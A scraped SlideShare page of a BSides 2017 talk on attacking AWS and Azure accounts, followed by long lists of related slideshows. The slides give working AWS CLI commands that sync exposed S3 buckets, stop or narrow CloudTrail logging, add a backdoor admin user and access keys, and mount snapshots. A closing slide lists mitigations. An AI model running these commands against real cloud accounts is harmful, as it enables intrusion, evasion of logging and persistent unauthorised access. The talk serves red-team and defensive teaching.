SlideShare a Scribd company logo

Pwned Cloud Society - BsidesSLC 2017

Bryce Kunz
Bryce Kunz

Pwned Cloud Society at BsidesSLC 2017 BsidesSLC 20170309

1 of 69
Download to read offline
PWNED CLOUD SOCIETY: Exploiting and Expanding Access within Azure & AWS
BRYCE KUNZ Bryce Kunz - @TweekFawkes @TweekFawkes PriorWork Experience: • Adobe DMa – RedTeam • DoD/NSA – Exploitation • DHS/OneNet – Defense Trainings & Sessions • RSA – mesos/docker • SAINTCON – osquery • BsidesLV – mesos/docker • Derbycon -WhiteLightning
CLOUD… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS
SO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure
SOO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure Google
SOOO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure GoogleRackspace
NEW-NEW Bryce Kunz - @TweekFawkes … they want that new-new … AWS Azure GoogleRackspace etc…
OLD IS NEW Bryce Kunz - @TweekFawkes … but really it’s not that much different …
OLD WAYS Bryce Kunz - @TweekFawkes … push code … … jenkins … … do work son … CIBatch Jobs Web Dev Code
NEW Bryce Kunz - @TweekFawkes … code … … some overpriced hipster services … … do work … CIBatch Jobs Web Dev S3 BucketBatch Lambda Code CodeDeploy
ADMINS Bryce Kunz - @TweekFawkes ... admin … AD/LDAP CIBatch Jobs Web Admin Dev Code
NEW ADMIN Bryce Kunz - @TweekFawkes … admins got to admin … AD/LDAP CIBatch Jobs Web Admin Dev Management Console S3 BucketBatch Lambda Code CodeDeploy
DEVOPS Bryce Kunz - @TweekFawkes … DevOp-ocalypse … AD/LDAP CIBatch Jobs Web DevOps Management Console S3 BucketBatch Lambda Code CodeDeploy
DEVOPS Bryce Kunz - @TweekFawkes … DevOp-ocalypse … AD/LDAP CIBatch Jobs Web DevOps Management Console S3 BucketBatch Lambda Code CodeDeploy
BAD DAYS Bryce Kunz - @TweekFawkes …happen…
BAD DAYS Bryce Kunz - @TweekFawkes … $50k!?!?!?
BAD DAYS Bryce Kunz - @TweekFawkes …EC2 instances destroyed…
INITIAL ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • Configuration Files
PASTEBIN Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • - PasteBin.com
GITHUB Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • - PasteBin.com • - GitHub.com
REPOS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • - BitBucket, GitLab • - Gerrit, GitBlit, Git • - SVN, etc…
DEPLOY ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • - Puppet, etc… • - Jenkins, etc…
HACK & D/L ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • Configuration Files • - Classic Hacks • -- D/L Secrets
WHAT… Bryce Kunz - @TweekFawkes Services - Many Services - API Access - User Access … is the point?
SO MANY … Bryce Kunz - @TweekFawkes …
TYPES Bryce Kunz - @TweekFawkes …
API Bryce Kunz - @TweekFawkes …
USERS Bryce Kunz - @TweekFawkes …
SETUP Bryce Kunz - @TweekFawkes Preparation • New EC2 Instance • Setup AWSTools On an Ubuntu 16.x EC2 instance… apt-get update apt-get install python-pip pip install aws-shell pip install awscli
S3 BUCKETS Bryce Kunz - @TweekFawkes … S3 Bucket Amazon S3
REGION ping -c3 exam.ple dig +nocmd exam.ple any +multiline +noall +answer nslookup 54.231.184.255 S3 Buckets • Find Region S3 Bucket Amazon S3
S3 BUCKETS aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • Find Region • Browse Files S3 Bucket Amazon S3
S3 BUCKETS aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • World Browsable S3 Bucket Amazon S3
S3 BUCKETS aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 S3 Buckets • World Browsable S3 Bucket Amazon S3
S3 BUCKETS aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • Sensitive Files S3 Bucket Amazon S3
S3 BUCKETS aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2 S3 Buckets • Sensitive Files S3 Bucket Amazon S3
S3 BUCKETS git log S3 Buckets • Sensitive Files • - GIT • - SVN • - etc… S3 Bucket Amazon S3
S3 BUCKETS git checkout f7c… S3 Buckets • Sensitive Files S3 Bucket Amazon S3
LEVERAGE SECRETS Bryce Kunz - @TweekFawkes Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets
CONFIGURE aws configure --profile example Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets AWS CLI AWS Cloud
VERIFY (remove the spaces around the = character for easier scripts) Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets AWS CLI AWS Cloud
WHOAMI aws --profile example sts get-caller-identity Survey Access • Who AreWe? AWS CLI AWS Cloud
IAM WHO aws --profile example iam get-user Survey Access • Who AreWe? • IAMWho? AWS CLI AWS Cloud
LOGGING Bryce Kunz - @TweekFawkes Survey Access • Who AreWe? • Logging? AWS CloudTrailAWS CLI AWS Cloud
LOGGING? aws --profile api_cloudtrail cloudtrail describe-trails Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
STOP-LOGS aws --profile api_cloudtrail configure set region us-east-1 aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east- 1:…:trail/…" Survey Access • Who AreWe? • Logging? AWS CloudTrail
OPSEC? Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
LOGGING? aws --profile api_cloudtrail cloudtrail describe-trails Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
NO MULTI aws --profile api_cloudtrail configure set region us-east-1 aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east- 1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events Stops logging in all regions… • EXCEPT the HomeRegion AWS CloudTrail
OPSEC… … Stops logging in all regions… • EXCEPT the HomeRegion AWS CloudTrail
PERSIST Bryce Kunz - @TweekFawkes Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add Account AWS CLI AWS Cloud
PERSIST aws --profile api_cloudtrail sts get-session-token Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
SETUP vi ~/.aws/credentials Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
SESSION aws --profile sessionTokens sts get-caller-identity Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
ADD KEY To an already existing user…. Persistence • SessionToken • -Valid for 12 Hours • Add Key AWS CLI AWS Cloud
ADD KEY Persistence • SessionToken • -Valid for 12 Hours • Add Key aws --profile api_iam iam list-users AWS CLI AWS Cloud
ADD KEY Persistence • SessionToken • -Valid for 12 Hours • Add Key aws --profile api_iam iam create-access-key --user-name test AWS CLI AWS Cloud
ADD USER Bryce Kunz - @TweekFawkes Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User AWS CLI AWS Cloud
ADD USER aws --profile api_iam iam create-user --user-name mryan aws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
ADD KEY aws --profile api_iam iam create-access-key --user-name mryan Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
ADD PASS aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
NEW EC2 Bryce Kunz - @TweekFawkes …
EC2 META Metadata Service: 169.254.169.254 curl http://169.254.169.254/latest/meta-data/ RFC-3927: https://tools.ietf.org/html/rfc3927 AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html AWS QueryTool: https://aws.amazon.com/code/1825 …
AZURE META Metadata Service: 169.254.169.254 curl http://169.254.169.254/metadata/v1/maintenance curl http://169.254.169.254/metadata/v1/InstanceInfo (these are mostly useless for hackers…) but useful information is copied into the … /var/lib/waagent directory when the instance is created… (root access needed) • IP address, hostname, subscription ID, resource group name, etc… …
SNAPS &IAM aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 -- snapshot-id snap-0b49342abd1bdcb89 mount /dev/xvdb1 /mnt find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less …
HARD BOOT Bryce Kunz - @TweekFawkes … Horrible OPSEC but it works… - Power off a server - Mount the server’s hard drive using another EC2 - Modify the server for remote access (e.g. add an SSH key to root user) - Power back on the server & PROFIT!
MITIGATIONS • Single Purpose Secrets • Limited the Access of each Secret • Create roles and limit the access of each role • You can ACL off secrets to only work from certain IP addresses • Log API calls (e.g. cloudtrail) • Never use root secrets (use as a break glass account only) • Rotate Secrets Frequently • Encrypt secrets within GIT and other data stores …
THANKS! Bryce Kunz - @TweekFawkes …
References • http://level4- 1156739cfb264ced6de514971a4bef68.flaws.cloud/hint 2.html • https://www.slideshare.net/chrisgates/devoops- attacks-and-defenses-for-devops-toolchains • http://flaws.cloud/ • https://danielgrzelak.com/disrupting-aws-logging- a42e437d6594 • https://danielgrzelak.com/backdooring-an-aws- account-da007d36f8f9 • https://danielgrzelak.com/exploring-an-aws-account- after-pwning-it-ff629c2aae39 • http://docplayer.net/24014561-Defending-the-cloud- from-the-full-stack-hack.html

Recommended

Orchestration Ownage - RSAC 2017
Orchestration Ownage - RSAC 2017Orchestration Ownage - RSAC 2017
Orchestration Ownage - RSAC 2017
Bryce Kunz
 
(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure
Amazon Web Services
 
Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)
Julien SIMON
 
Serverless Frameworks on AWS
Serverless Frameworks on AWSServerless Frameworks on AWS
Serverless Frameworks on AWS
Julien SIMON
 
Build A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million UsersBuild A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million Users
Amazon Web Services
 
DevOps with Amazon Web Services (November 2016)
DevOps with Amazon Web Services (November 2016)DevOps with Amazon Web Services (November 2016)
DevOps with Amazon Web Services (November 2016)
Julien SIMON
 
Migrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECSMigrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECS
Amazon Web Services
 
Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)
Julien SIMON
 

Recommended

Orchestration Ownage - RSAC 2017
Orchestration Ownage - RSAC 2017Orchestration Ownage - RSAC 2017
Orchestration Ownage - RSAC 2017
Bryce Kunz
 
(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure(ARC401) Cloud First: New Architecture for New Infrastructure
(ARC401) Cloud First: New Architecture for New Infrastructure
Amazon Web Services
 
Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)Running Open Source Platforms on AWS (November 2016)
Running Open Source Platforms on AWS (November 2016)
Julien SIMON
 
Serverless Frameworks on AWS
Serverless Frameworks on AWSServerless Frameworks on AWS
Serverless Frameworks on AWS
Julien SIMON
 
Build A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million UsersBuild A Website on AWS for Your First 10 Million Users
Build A Website on AWS for Your First 10 Million Users
Amazon Web Services
 
DevOps with Amazon Web Services (November 2016)
DevOps with Amazon Web Services (November 2016)DevOps with Amazon Web Services (November 2016)
DevOps with Amazon Web Services (November 2016)
Julien SIMON
 
Migrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECSMigrating the GoPro Plus Cloud Service to Amazon ECS
Migrating the GoPro Plus Cloud Service to Amazon ECS
Amazon Web Services
 
Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)Running Docker clusters on AWS (November 2016)
Running Docker clusters on AWS (November 2016)
Julien SIMON
 
AWS Deployment Best Practices
AWS Deployment Best PracticesAWS Deployment Best Practices
AWS Deployment Best Practices
Amazon Web Services
 
Building Serverless APIs on AWS
Building Serverless APIs on AWSBuilding Serverless APIs on AWS
Building Serverless APIs on AWS
Julien SIMON
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Amazon Web Services
 
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Amazon Web Services
 
Deep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECSDeep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECS
Amazon Web Services
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
Amazon Web Services
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
Amazon Web Services
 
A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)
Julien SIMON
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Amazon Web Services
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Amazon Web Services
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Amazon Web Services
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Amazon Web Services
 
Introduction to Docker on AWS
Introduction to Docker on AWSIntroduction to Docker on AWS
Introduction to Docker on AWS
Amazon Web Services
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
Amazon Web Services
 
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門 無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門
Amazon Web Services
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
Amazon Web Services
 
AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍
Eunsu Kim
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
Amazon Web Services
 

More Related Content

What's hot

AWS Deployment Best Practices
AWS Deployment Best PracticesAWS Deployment Best Practices
AWS Deployment Best Practices
Amazon Web Services
 
Building Serverless APIs on AWS
Building Serverless APIs on AWSBuilding Serverless APIs on AWS
Building Serverless APIs on AWS
Julien SIMON
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Amazon Web Services
 
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Amazon Web Services
 
Deep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECSDeep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECS
Amazon Web Services
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
Amazon Web Services
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
Amazon Web Services
 
A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)
Julien SIMON
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Amazon Web Services
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
Amazon Web Services
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Amazon Web Services
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Amazon Web Services
 
Introduction to Docker on AWS
Introduction to Docker on AWSIntroduction to Docker on AWS
Introduction to Docker on AWS
Amazon Web Services
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
Amazon Web Services
 
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
Amazon Web Services
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
Amazon Web Services
 
無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門 無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門
Amazon Web Services
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
Amazon Web Services
 

What's hot (20)

AWS Deployment Best Practices
AWS Deployment Best PracticesAWS Deployment Best Practices
AWS Deployment Best Practices
 
Building Serverless APIs on AWS
Building Serverless APIs on AWSBuilding Serverless APIs on AWS
Building Serverless APIs on AWS
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
 
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
Unlocking Agility with the AWS Serverless Application Model (SAM) - AWS Summi...
 
Deep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECSDeep Dive on Microservices and Amazon ECS
Deep Dive on Microservices and Amazon ECS
 
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
透過Amazon CloudFront 和AWS WAF來執行安全的內容傳輸
 
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...Scale Your Application while Improving Performance and Lowering Costs (SVC203...
Scale Your Application while Improving Performance and Lowering Costs (SVC203...
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
AWS Elastic Beanstalk under the Hood (DMG301) | AWS re:Invent 2013
 
A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)A 60-minute tour of AWS Compute (November 2016)
A 60-minute tour of AWS Compute (November 2016)
 
Secure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAFSecure Content Delivery Using Amazon CloudFront and AWS WAF
Secure Content Delivery Using Amazon CloudFront and AWS WAF
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
 
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
Stop Worrying about Prodweb001 and Start Loving i-98fb9856 (ARC201) | AWS re:...
 
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced GroupAdvanced AWS techniques from the trenches of the Enterprise – Sourced Group
Advanced AWS techniques from the trenches of the Enterprise – Sourced Group
 
Introduction to Docker on AWS
Introduction to Docker on AWSIntroduction to Docker on AWS
Introduction to Docker on AWS
 
Well-Architected for Security: Advanced Session
Well-Architected for Security: Advanced SessionWell-Architected for Security: Advanced Session
Well-Architected for Security: Advanced Session
 
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
AWS re:Invent 2016: Chalk Talk: Succeeding at Infrastructure-as-Code (GPSCT312)
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門 無伺服器架構和Containers on AWS入門
無伺服器架構和Containers on AWS入門
 
DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017DevOps Tooling - Pop-up Loft TLV 2017
DevOps Tooling - Pop-up Loft TLV 2017
 

Similar to Pwned Cloud Society - BsidesSLC 2017

AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍
Eunsu Kim
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
Amazon Web Services
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
Amazon Web Services
 
Being cloudy with perl
Being cloudy with perlBeing cloudy with perl
Being cloudy with perl
Jose Luis Martínez
 
Real world serverless - architecture, patterns and lessons learned
Real world serverless - architecture, patterns and lessons learnedReal world serverless - architecture, patterns and lessons learned
Real world serverless - architecture, patterns and lessons learned
David Schmitz
 
Aws(in)security - the devil is in the detail
Aws(in)security - the devil is in the detailAws(in)security - the devil is in the detail
Aws(in)security - the devil is in the detail
Pawel Rzepa
 
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
Amazon Web Services
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
Amazon Web Services
 
Serverless Development To Production Pipeline
Serverless Development To Production PipelineServerless Development To Production Pipeline
Serverless Development To Production Pipeline
Chase Douglas
 
Diving into Common AWS Misconfigurations
Diving into Common AWS MisconfigurationsDiving into Common AWS Misconfigurations
Diving into Common AWS Misconfigurations
Nikhil Sahoo
 
Lambdaless and AWS CDK
Lambdaless and AWS CDKLambdaless and AWS CDK
Lambdaless and AWS CDK
MooYeol Lee
 
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
Amazon Web Services
 
Owning aws infrastructure services
Owning aws infrastructure servicesOwning aws infrastructure services
Owning aws infrastructure services
Suraj Khetani
 
Bitbucket Pipelines - Powered by Kubernetes
Bitbucket Pipelines - Powered by KubernetesBitbucket Pipelines - Powered by Kubernetes
Bitbucket Pipelines - Powered by Kubernetes
Nathan Burrell
 
Fin jaws 202103
Fin jaws 202103Fin jaws 202103
Fin jaws 202103
Yuki Yoshida
 
AWS Summit Auckland 2014 | Black Belt Tips on AWS
